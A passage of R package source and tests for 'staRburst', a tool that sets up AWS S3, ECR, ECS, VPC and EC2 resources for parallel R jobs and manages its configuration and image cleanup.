#'   \code{starburst_map()}/\code{plan(starburst)} run on EC2 would fail because no
#'   capacity provider exists. It creates infrastructure at \code{DesiredCapacity = 0}
#'   (no billable instances are launched during setup). Set to FALSE if you only use
#'   the Fargate backend, which needs no capacity provider. Provision additional
#'   instance types later with \code{\link{starburst_setup_ec2}}.
#'
#' @return Invisibly returns the configuration list.
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   # Default: keep images forever (~$0.50/month idle cost)
#'   starburst_setup()
#'
#'   # Auto-delete images after 30 days (saves money if you stop using it)
#'   starburst_setup(ecr_image_ttl_days = 30)
#'
#'   # Use private base images with 7-day cleanup
#'   starburst_setup(use_public_base = FALSE, ecr_image_ttl_days = 7)
#'
#'   # Provision resources without building the image (fast; CI / connectivity checks)
#'   starburst_setup(build_image = FALSE)
#' }
#' }
starburst_setup <- function(region = "us-east-1", force = FALSE, use_public_base = TRUE,
                            ecr_image_ttl_days = NULL, build_image = TRUE,
                            setup_ec2 = TRUE) {

  cat_header("[Start] staRburst Setup\n")

  # Check if already set up
  if (!force && is_setup_complete()) {
    cat_info("[OK] staRburst is already configured\n")
    cat_info("  Use starburst_setup(force = TRUE) to reconfigure\n")
    return(invisible(TRUE))
  }

  cat_info("\nThis will configure AWS resources for staRburst:\n")
  cat_info("  * S3 bucket for data transfer\n")
  cat_info("  * ECR repository for Docker images\n")
  cat_info("  * ECS cluster (used by both EC2 and Fargate backends)\n")
  cat_info("  * VPC resources (subnets, security groups)\n")
  if (setup_ec2) {
    cat_info("  * EC2 capacity provider + Auto Scaling Group for the default\n")
    cat_info("    instance type (so the default EC2 backend works immediately)\n")
  }

  if (interactive()) {
    response <- readline("\nContinue? [y/n]: ")
    if (tolower(response) != "y") {
      cat_info("Setup cancelled\n")
      return(invisible(FALSE))
    }
  }

  # Step 1: AWS Credentials
  cat_info("\n[1/5] Checking AWS credentials...\n")
  if (!check_aws_credentials()) {
    cat_error("AWS credentials not found\n")
    cat_info("\nPlease configure AWS credentials using one of:\n")
    cat_info("  1. AWS CLI: aws configure\n")
    cat_info("  2. Environment variables: AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY\n")
    cat_info("  3. AWS credentials file: ~/.aws/credentials\n")
    stop("AWS credentials required")
  }
  cat_success("[OK] AWS credentials valid\n")

  # Step 2: S3 Bucket
  cat_info("\n[2/5] Setting up S3 bucket...\n")
  bucket_name <- sprintf("starburst-%s-%s",
                        get_aws_account_id(),
                        substr(uuid::UUIDgenerate(), 1, 8))

  bucket <- create_starburst_bucket(bucket_name, region)
  cat_success(sprintf("[OK] S3 bucket created: %s\n", bucket))

  # Step 3: ECR Repository
  cat_info("\n[3/5] Setting up ECR repository...\n")
  repo <- create_ecr_repository("starburst-worker", region)
  cat_success(sprintf("[OK] ECR repository created: %s\n", repo$repositoryUri))

  # Set up ECR lifecycle policy for auto-cleanup
  if (!is.null(ecr_image_ttl_days)) {
    cat_info(sprintf("   * Setting ECR auto-cleanup policy (TTL: %d days)...\n", ecr_image_ttl_days))
    create_ecr_lifecycle_policy(region, "starburst-worker", ecr_image_ttl_days)
  } else {
    cat_info("   * ECR auto-cleanup disabled (images kept indefinitely)\n")
    cat_info("     Idle cost: ~$0.50/month for stored images\n")
    cat_info("     To enable: starburst_setup(ecr_image_ttl_days = 30)\n")
  }

  # Step 4: ECS Cluster
  cat_info("\n[4/5] Setting up ECS cluster...\n")
  cluster <- create_ecs_cluster("starburst-cluster", region)
  cat_success(sprintf("[OK] ECS cluster created: %s\n", cluster$clusterName))

  # Step 5: VPC Resources
  cat_info("\n[5/5] Setting up VPC resources...\n")
  vpc_resources <- setup_vpc_resources(region)
  cat_success("[OK] VPC resources created\n")

  # Get AWS account ID for config
  account_id <- get_aws_account_id()

  # Save configuration
  config <- list(
    region = region,
    bucket = bucket,
    ecr_repository = repo$repositoryUri,
    ecs_cluster = cluster$clusterName,
    cluster_name = cluster$clusterName,  # Add for EC2 compatibility
    vpc_id = vpc_resources$vpc_id,
    subnets = vpc_resources$subnets,
    security_groups = vpc_resources$security_groups,
    use_public_base = use_public_base,
    ecr_image_ttl_days = ecr_image_ttl_days,
    aws_account_id = account_id,
    setup_at = Sys.time()
  )

  save_config(config)

  # Provision the default EC2 capacity provider + ASG so the default EC2 backend
  # works out of the box. Without this, the first EC2 run fails: start_warm_pool()
  # scales a named ASG that only setup_ec2_capacity_provider() creates. This makes
  # infrastructure at DesiredCapacity = 0 — no billable instances launched here.
  if (setup_ec2) {
    cat_info("\n[EC2] Provisioning default EC2 capacity provider (c7g.xlarge)...\n")
    cat_info("   * Creates a Launch Template + Auto Scaling Group at 0 instances\n")
    cat_info("   * No instances launch until you run a job (no cost from setup)\n")
    tryCatch({
      starburst_setup_ec2(region = region, instance_types = "c7g.xlarge",
                          force = TRUE)
    }, error = function(e) {
      cat_warn(sprintf("[!] EC2 capacity provisioning failed: %s\n", e$message))
      cat_warn("    Run starburst_setup_ec2() manually, or use the Fargate backend.\n")
    })
  }

  # Check quotas proactively
  cat_info("\n[Status] Checking Fargate quotas...\n")
  quota_info <- check_fargate_quota(region)

  cat_info(sprintf("Current Fargate vCPU quota: %d\n", quota_info$limit))
  cat_info(sprintf("  Allows ~%d workers with 4 vCPUs each\n",
                  floor(quota_info$limit / 4)))

  if (quota_info$limit < 500) {
    cat_warn("\n[TIP] For typical parallel workloads, we recommend 500+ vCPUs\n")

    if (!quota_info$increase_pending && interactive()) {
      response <- readline("\nRequest quota increase to 500 vCPUs now? [y/n]: ")
      if (tolower(response) == "y") {
        case_id <- request_quota_increase(
          service = "fargate",
          quota_code = "L-3032A538",
          desired_value = 500,
          region = region,
          reason = "staRburst parallel R computing setup"
        )

        if (!is.null(case_id)) {
          cat_success(sprintf("[OK] Quota increase requested (Case ID: %s)\n", case_id))
          cat_success("[OK] You'll receive email when approved (usually 1-24 hours)\n")
        }
      }
    }
  } else {
    cat_success(sprintf("[OK] Quota is sufficient (%d vCPUs)\n", quota_info$limit))
  }

  # Build initial environment (skippable: image is built lazily on first launch)
  if (build_image) {
    cat_info("\n[Build] Building initial R environment...\n")
    cat_info("This may take 5-10 minutes on first run\n")

    env_hash <- build_initial_environment(region)
    cat_success("[OK] Environment built and cached\n")
  } else {
    cat_info("\n[Build] Skipping environment image build (build_image = FALSE)\n")
    cat_info("  The worker image will be built automatically on first launch.\n")
  }

  # Final message
  cat_success("\n[OK] staRburst setup complete!\n")
  cat_info("\nQuick start:\n")
  cat_info("  results <- starburst_map(inputs, expensive_function, workers = 50)\n")
  cat_info("\nAlready using future/furrr? Set the plan instead:\n")
  cat_info("  library(furrr)\n")
  cat_info("  plan(starburst, workers = 50)\n")
  cat_info("  results <- future_map(inputs, expensive_function)\n")

  invisible(TRUE)
}

#' Get staRburst configuration
#'
#' @return List of configuration values
#' @keywords internal
get_starburst_config <- function() {
  config_file <- config_path()

  if (!file.exists(config_file)) {
    stop("staRburst not configured. Run starburst_setup() first.")
  }

  readRDS(config_file)
}

#' Save staRburst configuration
#'
#' @keywords internal
save_config <- function(config) {
  config_dir <- config_dir()
  if (!dir.exists(config_dir)) {
    dir.create(config_dir, recursive = TRUE)
  }

  config_file <- config_path()
  saveRDS(config, config_file)

  invisible(NULL)
}

#' Check if setup is complete
#'
#' @keywords internal
is_setup_complete <- function() {
  config_file <- config_path()
  file.exists(config_file)
}

#' Check if staRburst is configured
#'
#' Returns \code{TRUE} if \code{starburst_setup()} has been run, the
#' configuration file exists, and AWS credentials are available.
#' Useful for guarding example code that requires AWS credentials.
#'
#' @return \code{TRUE} if configured and credentials are available, \code{FALSE} otherwise.
#' @export
#' @examples
#' starburst_is_configured()
starburst_is_configured <- function() {
  if (!is_setup_complete()) return(FALSE)
  check_aws_credentials()
}

#' Resolve whether to auto-clean S3 files after a job
#'
#' Order: the \code{starburst.cleanup_s3} option (explicit runtime override), then
#' the persisted \code{auto_cleanup_s3} config (set via \code{\link{starburst_config}}),
#' then default \code{TRUE}.
#' @keywords internal
should_cleanup_s3 <- function() {
  opt <- getOption("starburst.cleanup_s3", NULL)
  if (!is.null(opt)) return(isTRUE(opt))
  cfg <- tryCatch(get_starburst_config()$auto_cleanup_s3, error = function(e) NULL)
  if (!is.null(cfg)) return(isTRUE(cfg))
  TRUE
}

#' Get configuration directory
#'
#' @keywords internal
config_dir <- function() {
  config_home <- Sys.getenv("XDG_CONFIG_HOME", "~/.config")
  file.path(config_home, "starburst")
}

#' Get configuration file path
#'
#' @keywords internal
config_path <- function() {
  file.path(config_dir(), "config.rds")
}

#' Configure staRburst options
#'
#' Reads and updates the persisted staRburst configuration. Call with no arguments
#' to leave settings unchanged (it still returns the current config invisibly); pass
#' one or more of the arguments below to update them.
#'
#' @param max_hourly_cost Maximum estimated **hourly** cost (USD/hour) for a job.
#'   Jobs whose estimated hourly rate exceeds this error before launching. This is a
#'   rate limit, not a total-job-cost cap. \code{NULL} leaves it unchanged.
#' @param cost_alert_threshold Estimated **hourly** cost (USD/hour) at which a
#'   warning is emitted. \code{NULL} leaves it unchanged.
#' @param auto_cleanup_s3 Logical; automatically delete a job's S3 task/result
#'   objects after completion. \code{NULL} leaves it unchanged.
#' @param ... Additional user-settable keys merged into the config. Recognized keys:
#'   \describe{
#'     \item{\code{use_public_base}}{Logical; pull the public base image instead of
#'       building a private one (see \code{\link{starburst_setup}}).}
#'     \item{\code{ecr_image_ttl_days}}{Integer; lifecycle age at which cached ECR
#'       images are expired.}
#'   }
#'
#' @details
#' Other keys in the stored config are **infrastructure-managed** — written by
#' \code{\link{starburst_setup}}/\code{\link{starburst_setup_ec2}} and not intended
#' to be set by hand: \code{region}, \code{bucket}, \code{cluster},
#' \code{ecr_repository}, \code{aws_account_id}, \code{execution_role_arn},
#' \code{task_role_arn}, \code{subnets}, and \code{security_groups}. Use
#' \code{\link{starburst_status}} to inspect the effective configuration read-only.
#'
#' @return Invisibly returns the updated configuration list.
#' @seealso \code{\link{starburst_status}} to view config without changing it;
#'   \code{\link{starburst_setup}} for initial provisioning.
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   # Update cost guardrails (both are hourly rates, USD/hour)
#'   starburst_config(
#'     max_hourly_cost = 10,
#'     cost_alert_threshold = 5
#'   )
#'
#'   # Read the current config without changing anything
#'   cfg <- starburst_config()
#' }
#' }
starburst_config <- function(max_hourly_cost = NULL,
                             cost_alert_threshold = NULL,
                             auto_cleanup_s3 = NULL,
                             ...) {

  config <- get_starburst_config()

  # Update config
  if (!is.null(max_hourly_cost)) {
    config$max_hourly_cost <- max_hourly_cost
  }

  if (!is.null(cost_alert_threshold)) {
    config$cost_alert_threshold <- cost_alert_threshold
  }

  if (!is.null(auto_cleanup_s3)) {
    config$auto_cleanup_s3 <- auto_cleanup_s3
  }

  # Handle additional options
  extra_opts <- list(...)
  if (length(extra_opts) > 0) {
    config <- c(config, extra_opts)
  }

  save_config(config)

  cat_success("[OK] Configuration updated\n")

  invisible(config)
}

#' Show staRburst status
#'
#' @return Invisibly returns a list with current configuration and quota information.
#' @export
starburst_status <- function() {
  config <- get_starburst_config()

  cat_header("staRburst Status\n")
  cat_info(sprintf("Region: %s\n", config$region))
  cat_info(sprintf("S3 Bucket: %s\n", config$bucket))
  cat_info(sprintf("ECR Repository: %s\n", config$ecr_repository))

  # Check quota
  quota_info <- check_fargate_quota(config$region)
  cat_info(sprintf("\nFargate vCPU Quota: %d / %d used\n",
                  quota_info$used, quota_info$limit))

  # List running clusters
  cat_info("\nActive Clusters:\n")
  clusters <- list_active_clusters(config$region)

  if (length(clusters) == 0) {
    cat_info("  (none)\n")
  } else {
    for (cluster in clusters) {
      cat_info(sprintf("  * %s: %d tasks running\n",
                      cluster$id, cluster$task_count))
    }
  }

  invisible(NULL)
}

#' Create S3 bucket for staRburst
#'
#' @keywords internal
create_starburst_bucket <- function(bucket_name, region) {
  s3 <- get_s3_client(region)

  # Check if bucket already exists
  bucket_exists <- tryCatch({
    s3$head_bucket(Bucket = bucket_name)
    TRUE
  }, error = function(e) {
    FALSE
  })

  if (bucket_exists) {
    cat_info(sprintf("   * Bucket already exists: %s\n", bucket_name))
    return(bucket_name)
  }

  # Create bucket
  tryCatch({
    if (region == "us-east-1") {
      s3$create_bucket(Bucket = bucket_name)
    } else {
      s3$create_bucket(
        Bucket = bucket_name,
        CreateBucketConfiguration = list(
          LocationConstraint = region
        )
      )
    }

    # Enable encryption
    tryCatch({
      s3$put_bucket_encryption(
        Bucket = bucket_name,
        ServerSideEncryptionConfiguration = list(
          Rules = list(
            list(
              ApplyServerSideEncryptionByDefault = list(
                SSEAlgorithm = "AES256"
              )
            )
          )
        )
      )
    }, error = function(e) {
      cat_warn(sprintf("[WARNING] Could not enable bucket encryption: %s\n", e$message))
    })

    # Set lifecycle policy (delete after 7 days)
    tryCatch({
      s3$put_bucket_lifecycle_configuration(
        Bucket = bucket_name,
        LifecycleConfiguration = list(
          Rules = list(
            list(
              ID = "cleanup-old-files",
              Status = "Enabled",
              Expiration = list(Days = as.integer(7)),
              Filter = list()
            )
          )
        )
      )
    }, error = function(e) {
      cat_warn(sprintf("[WARNING] Could not set lifecycle policy: %s\n", e$message))
    })

    bucket_name

  }, error = function(e) {
    stop(sprintf("Failed to create S3 bucket: %s", e$message))
  })
}

#' Create ECR repository
#'
#' @keywords internal
create_ecr_repository <- function(repo_name, region) {
  ecr <- get_ecr_client(region)

  tryCatch({
    response <- with_ecr_retry(
      {
        ecr$create_repository(
          repositoryName = repo_name,
          imageTagMutability = "MUTABLE",
          imageScanningConfiguration = list(
            scanOnPush = TRUE
          )
        )
      },
      max_attempts = 3,
      operation_name = "ECR CreateRepository"
    )

    response$repository

  }, error = function(e) {
    if (grepl("RepositoryAlreadyExistsException", e$message)) {
      # Repository exists, describe it
      response <- ecr$describe_repositories(
        repositoryNames = list(repo_name)
      )
      return(response$repositories[[1]])
    }
    stop(sprintf("Failed to create ECR repository: %s", e$message))
  })
}

#' Create ECS cluster
#'
#' @keywords internal
create_ecs_cluster <- function(cluster_name, region) {
  ecs <- get_ecs_client(region)

  # Check if cluster already exists
  cluster_exists <- tryCatch({
    response <- ecs$describe_clusters(clusters = list(cluster_name))
    length(response$clusters) > 0 && response$clusters[[1]]$status == "ACTIVE"
  }, error = function(e) {
    FALSE
  })

  if (cluster_exists) {
    cat_info(sprintf("   * Cluster already exists: %s\n", cluster_name))
    response <- ecs$describe_clusters(clusters = list(cluster_name))
    return(response$clusters[[1]])
  }

  tryCatch({
    response <- ecs$create_cluster(
      clusterName = cluster_name,
      capacityProviders = list("FARGATE", "FARGATE_SPOT"),
      defaultCapacityProviderStrategy = list(
        list(
          capacityProvider = "FARGATE",
          weight = 1,
          base = 0
        )
      )
    )

    response$cluster

  }, error = function(e) {
    stop(sprintf("Failed to create ECS cluster: %s", e$message))
  })
}

#' Setup VPC resources
#'
#' @keywords internal
setup_vpc_resources <- function(region) {
  ec2 <- get_ec2_client(region)

  # Use default VPC if exists, otherwise create
  vpcs <- ec2$describe_vpcs(Filters = list(
    list(Name = "isDefault", Values = list("true"))
  ))

  if (length(vpcs$Vpcs) > 0) {
    vpc_id <- vpcs$Vpcs[[1]]$VpcId
  } else {
    # Create VPC (simplified - production would be more complex)
    vpc <- ec2$create_vpc(CidrBlock = "10.0.0.0/16")
    vpc_id <- vpc$Vpc$VpcId
  }

  # Get or create private subnets
  subnets <- get_or_create_subnets(vpc_id, region)

  # Get or create security group
  security_group <- get_or_create_security_group(vpc_id, region)

  list(
    vpc_id = vpc_id,
    subnets = subnets,
    security_groups = list(security_group)
  )
}

# Output helpers

cat_header <- function(...) {
  cat("\n", crayon::bold(...), "\n", sep = "")
}

cat_info <- function(...) {
  cat(crayon::blue(...))
}

cat_success <- function(...) {
  cat(crayon::green(...))
}

cat_warn <- function(...) {
  cat(crayon::yellow(...))
}

cat_error <- function(...) {
  cat(crayon::red(...))
}

#' Setup EC2 capacity providers for staRburst
#'
#' One-time setup for EC2 launch type. Creates IAM roles, instance profiles,
#' and capacity providers for specified instance types.
#'
#' @param region AWS region (default: "us-east-1")
#' @param instance_types Character vector of instance types to setup (default: c("c7g.xlarge", "c7i.xlarge"))
#' @param force Force re-setup even if already configured
#'
#' @return Invisibly returns \code{TRUE} on success or \code{FALSE} on failure
#'   or cancellation.
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   # Setup with default instance types (Graviton and Intel)
#'   starburst_setup_ec2()
#'
#'   # Setup with custom instance types
#'   starburst_setup_ec2(instance_types = c("c7g.2xlarge", "r7g.xlarge"))
#' }
#' }
starburst_setup_ec2 <- function(region = "us-east-1",
                                instance_types = c("c7g.xlarge", "c7i.xlarge"),
                                force = FALSE) {

  cat_header("[Start] staRburst EC2 Setup\n")

  # First ensure basic setup is complete
  if (!is_setup_complete()) {
    cat_error("[ERROR] Basic staRburst setup not complete\n")
    cat_info("  Run starburst_setup() first\n")
    return(invisible(FALSE))
  }

  # Check AWS credentials
  if (!check_aws_credentials()) {
    cat_error("[ERROR] AWS credentials not found\n")
    return(invisible(FALSE))
  }

  cat_info("\nThis will configure EC2 resources for staRburst:\n")
  cat_info("  * IAM instance role and profile\n")
  cat_info("  * Security groups for ECS workers\n")
  cat_info(sprintf("  * Capacity providers for %d instance types\n", length(instance_types)))
  cat_info(sprintf("  * Instance types: %s\n", paste(instance_types, collapse = ", ")))

  if (interactive() && !force) {
    response <- readline("\nContinue? [y/n]: ")
    if (tolower(response) != "y") {
      cat_info("Setup cancelled\n")
      return(invisible(FALSE))
    }
  }

  # Get configuration
  config <- get_starburst_config()

  # Create backend-like object for each instance type
  cat_info("\n[1/2] Setting up IAM roles and security groups...\n")

  # This will be called once per instance type, but the functions are idempotent
  ensure_ecs_instance_profile(region)
  ensure_ecs_security_group(region)

  cat_success("[OK] IAM roles and security groups ready\n")

  # Setup capacity providers for each instance type
  cat_info(sprintf("\n[2/2] Setting up capacity providers for %d instance types...\n", length(instance_types)))

  for (instance_type in instance_types) {
    cat_info(sprintf("\n  Setting up %s...\n", instance_type))

    architecture <- get_architecture_from_instance_type(instance_type)

    # Create mock backend for setup
    backend <- list(
      region = region,
      cluster = config$cluster %||% "starburst-cluster",
      instance_type = instance_type,
      architecture = architecture,
      use_spot = FALSE,  # Default to on-demand for setup
      capacity_provider_name = sprintf("starburst-%s", gsub("\\.", "-", instance_type)),
      asg_name = sprintf("starburst-asg-%s", gsub("\\.", "-", instance_type)),
      aws_account_id = config$aws_account_id
    )

    tryCatch({
      setup_ec2_capacity_provider(backend)
      cat_success(sprintf("  [OK] %s ready\n", instance_type))
    }, error = function(e) {
      cat_error(sprintf("  [ERROR] Failed to setup %s: %s\n", instance_type, e$message))
    })
  }

  cat_success("\n[OK] EC2 setup complete!\n")
  cat_info("\nYou can now use EC2 launch type:\n")
  cat_info("  plan(starburst, workers = 100, launch_type = \"EC2\",\n")
  cat_info("       instance_type = \"c7g.xlarge\", use_spot = TRUE)\n")

  invisible(TRUE)
}

#' Clean up staRburst ECR images
#'
#' Manually delete Docker images from ECR to save storage costs.
#' Images will be rebuilt on next use (adds 3-5 min delay).
#'
#' @param force Delete all images immediately, ignoring TTL
#' @param region AWS region (default: from config)
#'
#' @return Invisibly returns \code{TRUE} on success or \code{FALSE} if not
#'   configured.
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   # Delete images past TTL
#'   starburst_cleanup_ecr()
#'
#'   # Delete all images immediately (save $0.50/month)
#'   starburst_cleanup_ecr(force = TRUE)
#' }
#' }
starburst_cleanup_ecr <- function(force = FALSE, region = NULL) {
  if (!is_setup_complete()) {
    cat_error("[ERROR] staRburst not configured. Run starburst_setup() first.\n")
    return(invisible(FALSE))
  }

  config <- get_starburst_config()
  if (is.null(region)) {
    region <- config$region
  }

  ecr <- get_ecr_client(region)
  repo_name <- "starburst-worker"

  cat_header("[Cleaning] staRburst ECR Cleanup\n")

  # List all images
  tryCatch({
    images <- ecr$list_images(repositoryName = repo_name)

    if (length(images$imageIds) == 0) {
      cat_info("[OK] No images to clean up\n")
      return(invisible(TRUE))
    }

    cat_info(sprintf("Found %d images in ECR\n", length(images$imageIds)))

    # Get detailed info for each image
    image_details <- ecr$describe_images(repositoryName = repo_name)$imageDetails

    images_to_delete <- list()

    for (img in image_details) {
      image_tag <- if (length(img$imageTags) > 0) img$imageTags[[1]] else "untagged"
      push_time <- img$imagePushedAt
      age_days <- as.numeric(difftime(Sys.time(), push_time, units = "days"))
      size_mb <- img$imageSizeInBytes / 1024 / 1024

      if (force) {
        cat_info(sprintf("  * %s (%.0f days old, %.1f MB) - WILL DELETE\n",
                        image_tag, age_days, size_mb))
        images_to_delete <- c(images_to_delete, list(list(imageTag = image_tag)))
      } else if (!is.null(config$ecr_image_ttl_days) && age_days > config$ecr_image_ttl_days) {
        cat_info(sprintf("  * %s (%.0f days old, %.1f MB) - EXPIRED\n",
                        image_tag, age_days, size_mb))
        images_to_delete <- c(images_to_delete, list(list(imageTag = image_tag)))
      } else {
        cat_info(sprintf("  * %s (%.0f days old, %.1f MB) - keeping\n",
                        image_tag, age_days, size_mb))
      }
    }

    if (length(images_to_delete) == 0) {
      cat_success("\n[OK] No images need cleanup\n")
      return(invisible(TRUE))
    }

    # Confirm deletion
    if (interactive() && !force) {
      response <- readline(sprintf("\nDelete %d images? [y/n]: ", length(images_to_delete)))
      if (tolower(response) != "y") {
        cat_info("Cleanup cancelled\n")
        return(invisible(FALSE))
      }
    }

    # Delete images
    cat_info(sprintf("\nDeleting %d images...\n", length(images_to_delete)))
    ecr$batch_delete_image(
      repositoryName = repo_name,
      imageIds = images_to_delete
    )

    cat_success(sprintf("[OK] Deleted %d images\n", length(images_to_delete)))
    cat_info("  Images will be rebuilt on next use (adds 3-5 min)\n")

    invisible(TRUE)

  }, error = function(e) {
    cat_error(sprintf("[ERROR] Cleanup failed: %s\n", e$message))
    invisible(FALSE)
  })
}

# Tests for ECR auto-cleanup functionality

test_that("ECR lifecycle policy can be created", {
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")
  skip("Manual test - modifies ECR policy")  # Remove to run

  # Create lifecycle policy
  create_ecr_lifecycle_policy(
    region = "us-east-1",
    repository_name = "starburst-worker",
    ttl_days = 30
  )

  # Verify policy exists
  ecr <- get_ecr_client("us-east-1")
  policy <- ecr$get_lifecycle_policy(repositoryName = "starburst-worker")

  expect_true(!is.null(policy$lifecyclePolicyText))

  # Parse policy
  policy_data <- jsonlite::fromJSON(policy$lifecyclePolicyText)
  expect_equal(policy_data$rules[[1]]$selection$countNumber, 30)
})

test_that("ECR image age checking works with TTL", {
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")

  config <- get_starburst_config()

  # Test with very long TTL (shouldn't trigger rebuild)
  result1 <- check_ecr_image_age(
    region = config$region,
    image_tag = "base-4.5.2",
    ttl_days = 365,
    force_rebuild = FALSE
  )

  expect_true(result1)  # Image is fresh

  # Test with very short TTL (would trigger rebuild if image is old enough)
  # Don't actually rebuild in test
  result2 <- check_ecr_image_age(
    region = config$region,
    image_tag = "base-4.5.2",
    ttl_days = 0,  # Any age is too old
    force_rebuild = FALSE
  )

  # Should warn but not rebuild (force_rebuild = FALSE)
  expect_type(result2, "logical")
})

test_that("Manual ECR cleanup works", {
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")
  skip("Manual test - deletes images")  # Remove to run

  # This would actually delete images
  # result <- starburst_cleanup_ecr(force = FALSE)

  # expect_type(result, "logical")
})

test_that("ECR cleanup respects TTL configuration", {
  config_with_ttl <- list(
    region = "us-east-1",
    ecr_image_ttl_days = 30
  )

  config_no_ttl <- list(
    region = "us-east-1",
    ecr_image_ttl_days = NULL
  )

  expect_equal(config_with_ttl$ecr_image_ttl_days, 30)
  expect_null(config_no_ttl$ecr_image_ttl_days)
})

test_that("Config includes ECR TTL setting", {
  skip_on_cran()
  skip_if_not(is_setup_complete(), "starburst not configured")

  config <- get_starburst_config()

  # Config should have ecr_image_ttl_days field (may be NULL)
  expect_true("ecr_image_ttl_days" %in% names(config))
})

test_that("ECR TTL affects idle cost", {
  # With TTL: $0 idle cost (images auto-deleted)
  config_with_ttl <- list(ecr_image_ttl_days = 30)
  expect_equal(config_with_ttl$ecr_image_ttl_days, 30)

  # Without TTL: ~$0.50/month idle cost (images persist)
  config_no_ttl <- list(ecr_image_ttl_days = NULL)
  expect_null(config_no_ttl$ecr_image_ttl_days)

  # This is a documentation test - actual costs are external to the code
})

test_that("Lifecycle policy prevents surprise bills", {
  # This is more of a documentation/integration test

  # Scenario: User runs job once and forgets
  # - With TTL: AWS auto-deletes images after X days -> $0 cost
  # - Without TTL: Images persist forever -> ~$0.50/month

  config <- list(ecr_image_ttl_days = 7)

  # After 7 days, AWS will automatically delete images
  # No manual intervention needed
  # No surprise bills

  expect_equal(config$ecr_image_ttl_days, 7)
})

test_that("plan.starburst validates inputs", {
  skip_if_not(is_setup_complete(), "staRburst not configured")

  expect_error(plan.starburst(workers = -1))
  expect_error(plan.starburst(workers = 0))
  expect_error(plan.starburst(cpu = 3))
  expect_error(plan.starburst(memory = "invalid"))
})

test_that("plan.starburst creates valid plan object", {
  skip_if_not(is_setup_complete(), "staRburst not configured")
  skip("Requires AWS credentials and setup")

  plan <- plan.starburst(workers = 10, cpu = 4, memory = "8GB")

  expect_s3_class(plan, "starburst")
  expect_s3_class(plan, "cluster")
  expect_s3_class(plan, "future")

  expect_true("cluster_id" %in% names(plan))
  expect_true("workers" %in% names(plan))
  expect_equal(plan$workers, 10)
  expect_equal(plan$cpu, 4)
})

test_that("starburst_map and starburst_cluster expose backend override args", {
  # Guards against the regression where the changelog promised launch_type/
  # instance_type/use_spot on these functions but the signatures lacked them
  # (so the args silently fell into ... and were passed to .f).
  for (fn in list(starburst_map, starburst_cluster)) {
    args <- names(formals(fn))
    expect_true(all(c("launch_type", "instance_type", "use_spot") %in% args))
    expect_identical(eval(formals(fn)$launch_type), "EC2")
    expect_identical(eval(formals(fn)$use_spot), TRUE)
  }
})

test_that("starburst_map forwards backend overrides to plan.starburst", {
  skip_if_not_installed("mockery")

  captured <- NULL
  # Stop execution right after plan.starburst is called by throwing a sentinel,
  # so the test never touches AWS/future.
  mockery::stub(starburst_map, "plan.starburst", function(...) {
    captured <<- list(...)
    stop("stop-after-plan")
  })
  mockery::stub(starburst_map, "get_starburst_config", function() list(region = "us-east-1"))

  expect_error(
    starburst_map(1:3, function(x) x,
                  launch_type = "FARGATE", instance_type = "c6a.large",
                  use_spot = FALSE, .progress = FALSE),
    "stop-after-plan"
  )
  expect_equal(captured$launch_type, "FARGATE")
  expect_equal(captured$instance_type, "c6a.large")
  expect_false(captured$use_spot)
})

test_that("starburst_setup provisions default EC2 capacity by default", {
  skip_if_not_installed("mockery")

  # Stub every AWS collaborator so no network/credentials are touched.
  mockery::stub(starburst_setup, "check_aws_credentials", function() TRUE)
  mockery::stub(starburst_setup, "create_starburst_bucket", function(...) "starburst-test-bucket")
  mockery::stub(starburst_setup, "create_ecr_repository",
                function(...) list(repositoryUri = "acct.dkr.ecr/starburst-worker"))
  mockery::stub(starburst_setup, "create_ecs_cluster",
                function(...) list(clusterName = "starburst-cluster"))
  mockery::stub(starburst_setup, "setup_vpc_resources",
                function(...) list(vpc_id = "vpc-1", subnets = c("s-1"),
                                   security_groups = c("sg-1")))
  mockery::stub(starburst_setup, "get_aws_account_id", function() "123456789012")
  mockery::stub(starburst_setup, "save_config", function(...) invisible(TRUE))
  mockery::stub(starburst_setup, "check_fargate_quota",
                function(...) list(limit = 1000, increase_pending = FALSE))
  mockery::stub(starburst_setup, "build_initial_environment", function(...) "hash")

  ec2_mock <- mockery::mock(invisible(TRUE))
  mockery::stub(starburst_setup, "starburst_setup_ec2", ec2_mock)

  # setup_ec2 = TRUE (default): starburst_setup_ec2 must be called once, for the
  # default instance type, so the default EC2 backend works out of the box.
  starburst_setup(region = "us-east-1", force = TRUE, build_image = FALSE)
  mockery::expect_called(ec2_mock, 1)
  args <- mockery::mock_args(ec2_mock)[[1]]
  expect_true("c7g.xlarge" %in% unlist(args))
})

test_that("starburst_setup(setup_ec2 = FALSE) skips EC2 provisioning", {
  skip_if_not_installed("mockery")

  mockery::stub(starburst_setup, "check_aws_credentials", function() TRUE)
  mockery::stub(starburst_setup, "create_starburst_bucket", function(...) "b")
  mockery::stub(starburst_setup, "create_ecr_repository",
                function(...) list(repositoryUri = "uri"))
  mockery::stub(starburst_setup, "create_ecs_cluster",
                function(...) list(clusterName = "starburst-cluster"))
  mockery::stub(starburst_setup, "setup_vpc_resources",
                function(...) list(vpc_id = "vpc-1", subnets = c("s-1"),
                                   security_groups = c("sg-1")))
  mockery::stub(starburst_setup, "get_aws_account_id", function() "123456789012")
  mockery::stub(starburst_setup, "save_config", function(...) invisible(TRUE))
  mockery::stub(starburst_setup, "check_fargate_quota",
                function(...) list(limit = 1000, increase_pending = FALSE))

  ec2_mock <- mockery::mock(invisible(TRUE))
  mockery::stub(starburst_setup, "starburst_setup_ec2", ec2_mock)

  starburst_setup(region = "us-east-1", force = TRUE, build_image = FALSE,
                  setup_ec2 = FALSE)
  mockery::expect_called(ec2_mock, 0)
})

test_that("should_cleanup_s3 resolves option > config > default", {
  skip_if_not_installed("mockery")
  withr::local_options(starburst.cleanup_s3 = NULL)

  # Config says FALSE, no option -> FALSE (the previously-ignored setting now works)
  mockery::stub(should_cleanup_s3, "get_starburst_config",
                function() list(auto_cleanup_s3 = FALSE))
  expect_false(should_cleanup_s3())

  # Config says TRUE -> TRUE
  mockery::stub(should_cleanup_s3, "get_starburst_config",
